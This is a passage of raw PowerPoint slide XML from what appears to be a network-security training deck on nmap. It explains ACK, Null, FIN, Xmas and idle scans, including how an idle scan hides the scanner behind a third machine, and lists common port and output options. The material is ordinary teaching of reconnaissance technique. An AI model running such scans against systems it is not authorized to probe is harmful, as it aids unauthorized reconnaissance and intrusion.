          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="120A22"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="777240" y="1984248"/>
            <a:ext cx="2103120" cy="292608"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>-sA</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3017520" y="1984248"/>
            <a:ext cx="2103120" cy="292608"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>A for ACK</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Text 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5212080" y="1984248"/>
            <a:ext cx="6217920" cy="292608"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1350" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Finds no open ports. Shows you where a firewall is filtering</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1350" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="777240" y="2587752"/>
            <a:ext cx="2103120" cy="292608"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>-sN</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Text 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3017520" y="2587752"/>
            <a:ext cx="2103120" cy="292608"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>N for Null</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Text 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5212080" y="2587752"/>
            <a:ext cx="6217920" cy="292608"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1350" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>No flags set at all. Old Unix systems answer RST if the port is closed</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1350" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Shape 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548640" y="2962656"/>
            <a:ext cx="11091672" cy="603504"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="120A22"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Text 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="777240" y="3191256"/>
            <a:ext cx="2103120" cy="292608"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>-sF</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Text 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3017520" y="3191256"/>
            <a:ext cx="2103120" cy="292608"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>F for FIN</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Text 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5212080" y="3191256"/>
            <a:ext cx="6217920" cy="292608"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1350" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Only the FIN flag, as if closing a connection that was never opened</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1350" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Text 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="777240" y="3794760"/>
            <a:ext cx="2103120" cy="292608"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>-sX</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Text 16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3017520" y="3794760"/>
            <a:ext cx="2103120" cy="292608"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>X for Xmas</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Text 17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5212080" y="3794760"/>
            <a:ext cx="6217920" cy="292608"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1350" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>FIN, PSH and URG at once. Lit up like a tree, hence the name</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1350" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Shape 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548640" y="4169664"/>
            <a:ext cx="11091672" cy="603504"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="120A22"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Text 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="777240" y="4398264"/>
            <a:ext cx="2103120" cy="292608"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>-sI</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Text 20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3017520" y="4398264"/>
            <a:ext cx="2103120" cy="292608"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>I for Idle</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Text 21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5212080" y="4398264"/>
            <a:ext cx="6217920" cy="292608"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1350" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Bounces the scan off a third machine, so the target sees that machine</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1350" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Shape 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548640" y="4983480"/>
            <a:ext cx="11091672" cy="1143000"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 5600"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1B1033"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="342A4A"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Text 23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="822960" y="5148072"/>
            <a:ext cx="10515600" cy="822960"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2100"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1450" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>In practice:  </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2100"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1450" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>you will use -sS, -sU and -sT for years and hardly ever reach for the rest. The exotic scans depend on an operating system following a 1981 document politely, and modern systems do not. Know they exist, then move on.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="14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02 / SCANNING</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The nmap options you will actually use</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19</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="566928" y="1188720"/>
            <a:ext cx="11064240" cy="237744"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1150" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>-s scan type   -p ports   -o output file   -T timing   -P host discovery   -v verbose</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1150" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Shape 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548640" y="1536192"/>
            <a:ext cx="5440680" cy="2103120"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 3043"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="150D26"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="342A4A"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="804672" y="1719072"/>
            <a:ext cx="4846320" cy="237744"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" spc="120" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>WHICH PORTS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="804672" y="2066544"/>
            <a:ext cx="5029200" cy="1463040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1700"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1150" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>-p 22,80,445     only these</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1150" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1700"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1150" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>-p-              all 65535 of them</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1150" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1700"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1150" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>--top-ports 100  the 100 most common</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1150" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1700"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1150" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>--open           hide the closed ones</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1150" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Shape 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6172200" y="1536192"/>
            <a:ext cx="5440680" cy="2103120"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 3043"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="150D26"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="342A4A"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6428232" y="1719072"/>
            <a:ext cx="4846320" cy="237744"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
